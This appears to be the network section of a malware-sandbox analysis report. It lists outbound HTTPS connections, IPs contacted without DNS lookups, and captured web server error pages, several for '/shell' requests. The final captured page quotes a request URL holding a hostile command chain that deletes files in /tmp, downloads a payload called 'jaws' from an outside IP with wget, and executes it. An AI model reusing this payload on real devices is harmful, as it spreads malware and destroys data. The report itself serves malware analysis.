Source: unknown	Network traffic detected: HTTP traffic on port 56212 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51230
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53530
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54988
Source: unknown	Network traffic detected: HTTP traffic on port 38556 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 37540 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56624 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 45952 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 45600 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50150
Source: unknown	Network traffic detected: HTTP traffic on port 51794 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56140 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 43992 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 33098 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55218 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 46968 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 45600
Source: unknown	Network traffic detected: HTTP traffic on port 36150 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 39760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 38056 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55606
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 40030
Source: unknown	Network traffic detected: HTTP traffic on port 46490 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 34630 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 33610
Source: unknown	Network traffic detected: HTTP traffic on port 56956 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52400 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54008 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51490
Source: unknown	Network traffic detected: HTTP traffic on port 44788 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60880 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 48934 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 41598
Source: unknown	Network traffic detected: HTTP traffic on port 57878 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 44986
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 44504
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 45952
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 43532
Source: unknown	Network traffic detected: HTTP traffic on port 51930 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60274 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54406
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55616
Source: unknown	Network traffic detected: HTTP traffic on port 56118 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 38628 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 39276
Source: unknown	Network traffic detected: HTTP traffic on port 45528 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 35900
Source: unknown	Network traffic detected: HTTP traffic on port 55356 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55410 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 32992
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60088
Source: unknown	Network traffic detected: HTTP traffic on port 39022 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 39276 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 40258
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 47840
Source: unknown	Network traffic detected: HTTP traffic on port 56608 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 47296 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 34920 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 51230 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 34462 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 33428 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 33558
Source: unknown	Network traffic detected: HTTP traffic on port 52624 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 34524
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 37910
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 34650
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53170
Source: unknown	Network traffic detected: HTTP traffic on port 58234 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 47958
Source: unknown	Network traffic detected: HTTP traffic on port 46726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57350 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 41984 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 43156 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 45654
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 41058
Source: unknown	Network traffic detected: HTTP traffic on port 37660 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 43474
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 45530
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 40086
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 40084
Source: unknown	Network traffic detected: HTTP traffic on port 39440 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 33428
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 35968
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 34878
Source: unknown	Network traffic detected: HTTP traffic on port 44556 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54480 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62455 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55356
Source: unknown	Network traffic detected: HTTP traffic on port 44986 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 48260 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56212
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59720
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54396
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54394
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 48916
Source: unknown	Network traffic detected: HTTP traffic on port 56260 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 41048
Source: unknown	Network traffic detected: HTTP traffic on port 56018 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 37908
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 45528
Source: unknown	Network traffic detected: HTTP traffic on port 55810 -> 443

Source: unknown	TCP traffic detected without corresponding DNS query: 119.56.28.63
Source: unknown	TCP traffic detected without corresponding DNS query: 164.163.128.63
Source: unknown	TCP traffic detected without corresponding DNS query: 48.38.69.47
Source: unknown	TCP traffic detected without corresponding DNS query: 143.132.170.4
Source: unknown	TCP traffic detected without corresponding DNS query: 18.200.65.140
Source: unknown	TCP traffic detected without corresponding DNS query: 174.36.86.149
Source: unknown	TCP traffic detected without corresponding DNS query: 46.22.25.60
Source: unknown	TCP traffic detected without corresponding DNS query: 120.254.4.252
Source: unknown	TCP traffic detected without corresponding DNS query: 136.125.53.152
Source: unknown	TCP traffic detected without corresponding DNS query: 88.92.139.157
Source: unknown	TCP traffic detected without corresponding DNS query: 17.126.211.13
Source: unknown	TCP traffic detected without corresponding DNS query: 97.51.17.237
Source: unknown	TCP traffic detected without corresponding DNS query: 124.55.13.245
Source: unknown	TCP traffic detected without corresponding DNS query: 66.57.111.242
Source: unknown	TCP traffic detected without corresponding DNS query: 170.137.120.145
Source: unknown	TCP traffic detected without corresponding DNS query: 129.178.172.113
Source: unknown	TCP traffic detected without corresponding DNS query: 189.51.76.83
Source: unknown	TCP traffic detected without corresponding DNS query: 146.21.183.227
Source: unknown	TCP traffic detected without corresponding DNS query: 220.123.121.129
Source: unknown	TCP traffic detected without corresponding DNS query: 189.58.217.237
Source: unknown	TCP traffic detected without corresponding DNS query: 103.250.214.19
Source: unknown	TCP traffic detected without corresponding DNS query: 160.131.164.73
Source: unknown	TCP traffic detected without corresponding DNS query: 90.162.2.0
Source: unknown	TCP traffic detected without corresponding DNS query: 18.125.221.149
Source: unknown	TCP traffic detected without corresponding DNS query: 42.170.246.198
Source: unknown	TCP traffic detected without corresponding DNS query: 189.156.239.99
Source: unknown	TCP traffic detected without corresponding DNS query: 19.215.22.39
Source: unknown	TCP traffic detected without corresponding DNS query: 40.209.239.25
Source: unknown	TCP traffic detected without corresponding DNS query: 109.184.221.7
Source: unknown	TCP traffic detected without corresponding DNS query: 34.201.98.214
Source: unknown	TCP traffic detected without corresponding DNS query: 27.216.202.208
Source: unknown	TCP traffic detected without corresponding DNS query: 35.238.214.190
Source: unknown	TCP traffic detected without corresponding DNS query: 136.9.83.156
Source: unknown	TCP traffic detected without corresponding DNS query: 74.104.209.158
Source: unknown	TCP traffic detected without corresponding DNS query: 144.218.109.233
Source: unknown	TCP traffic detected without corresponding DNS query: 65.30.16.229
Source: unknown	TCP traffic detected without corresponding DNS query: 46.130.222.64
Source: unknown	TCP traffic detected without corresponding DNS query: 24.228.230.209
Source: unknown	TCP traffic detected without corresponding DNS query: 189.178.155.10
Source: unknown	TCP traffic detected without corresponding DNS query: 115.56.233.238
Source: unknown	TCP traffic detected without corresponding DNS query: 188.90.244.109
Source: unknown	TCP traffic detected without corresponding DNS query: 34.241.47.49
Source: unknown	TCP traffic detected without corresponding DNS query: 76.135.222.6
Source: unknown	TCP traffic detected without corresponding DNS query: 181.186.150.189
Source: unknown	TCP traffic detected without corresponding DNS query: 142.5.66.155
Source: unknown	TCP traffic detected without corresponding DNS query: 133.167.106.171
Source: unknown	TCP traffic detected without corresponding DNS query: 31.195.48.73
Source: unknown	TCP traffic detected without corresponding DNS query: 209.67.64.250
Source: unknown	TCP traffic detected without corresponding DNS query: 161.58.75.134
Source: unknown	TCP traffic detected without corresponding DNS query: 197.163.171.22

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Mon, 01 Nov 2021 09:08:31 GMTContent-Type: text/htmlContent-Length: 178Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 01 Nov 2021 09:08:32 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 01 Nov 2021 09:08:32 GMTContent-Type: text/html; charset=UTF-8Content-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 09:08:37 GMTServer: ApacheX-XSS-Protection: 1; mode=blockX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 73 68 65 6c 6c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /shell was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 01 Nov 2021 09:08:39 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 207Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 2f 73 68 65 6c 6c 0a 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access /shellon this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 05:05:55 GMTServer: WebsCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 09:08:39 GMTServer: ApacheAccept-Ranges: bytesCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheExpires: 0Keep-Alive: timeout=5, max=100Connection: Keep-AliveTransfer-Encoding: chunkedContent-Type: text/htmlData Raw: 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 35 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 0d 0a 33 0d 0a 34 30 34 0d 0a 31 0d 0a 20 0d 0a 39 0d 0a 4e 6f 74 20 46 6f 75 6e 64 0d 0a 31 66 63 61 0d 0a 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 09:08:43 GMTServer: ApacheAccept-Ranges: bytesVary: Accept-Encoding,User-AgentCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheExpires: 0Keep-Alive: timeout=1, max=100Connection: Keep-AliveTransfer-Encoding: chunkedContent-Type: text/htmlData Raw: 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 35 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 0d 0a 33 0d 0a 34 30 34 0d 0a 31 0d 0a 20 0d 0a 39 0d 0a 4e 6f 74 20 46 6f 75 6e 64 0d 0a 31 66 63 61 0d 0a 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: thttpd/2.25b 29dec2003Content-Type: text/html; charset=UTF-8Date: Sat, 17 Oct 2015 00:23:52 GMTLast-Modified: Sat, 17 Oct 2015 00:23:52 GMTAccept-Ranges: bytesConnection: closeCache-Control: no-cache,no-storeData Raw: 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 20 4c 49 4e 4b 3d 22 23 32 30 32 30 66 66 22 20 56 4c 49 4e 4b 3d 22 23 34 30 34 30 63 63 22 3e 0a 3c 48 32 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 48 32 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 27 2f 73 68 65 6c 6c 3f 63 64 2b 2f 74 6d 70 3b 72 6d 2b 2d 72 66 2b 2a 3b 77 67 65 74 2b 34 39 2e 31 32 2e 32 33 33 2e 35 32 2f 6a 61 77 73 3b 73 68 2b 2f 74 6d 70 2f 6a 61 77 73 27 20 72 65 73 6f 6c 76 65 73 20 74 6f 20 61 20 66 69 6c 65 20 70 6c 75 73 20 43 47 49 2d 73 74 79 6c 65 20 70 61 74 68 69 6e 66 6f 2c 20 62 75 74 20 74 68 65 20 66 69 6c 65 20 69 73 20 6e 6f 74 20 61 20 76 61 6c 69 64 20 43 47 49 20 66 69 6c 65 2e 0a 3c 48 52 3e 0a 3c 41 44 44 52 45 53 53 3e 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 61 63 6d 65 2e 63 6f 6d 2f 73 6f 66 74 77 61 72 65 2f 74 68 74 74 70 64 2f 22 3e 74 68 74 74 70 64 2f 32 2e 32 35 62 20 32 39 64 65 63 32 30 30 33 3c 2f 41 3e 3c 2f 41 44 44 52 45 53 53 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>403 Forbidden</TITLE></HEAD><BODY BGCOLOR="#cc9999" TEXT="#000000" LINK="#2020ff" VLINK="#4040cc"><H2>403 Forbidden</H2>The requested URL '/shell?cd+/tmp;rm+-rf+*;wget+49.12.233.52/jaws;sh+/tmp/jaws' resolves to a file plus CGI-style pathinfo, but the file is not a valid CGI file.<HR><ADDRESS><A HREF="http://www.acme.com/software/thttpd/">thttpd/2.25b 29dec2003</A></ADDRESS></BODY></HTML>
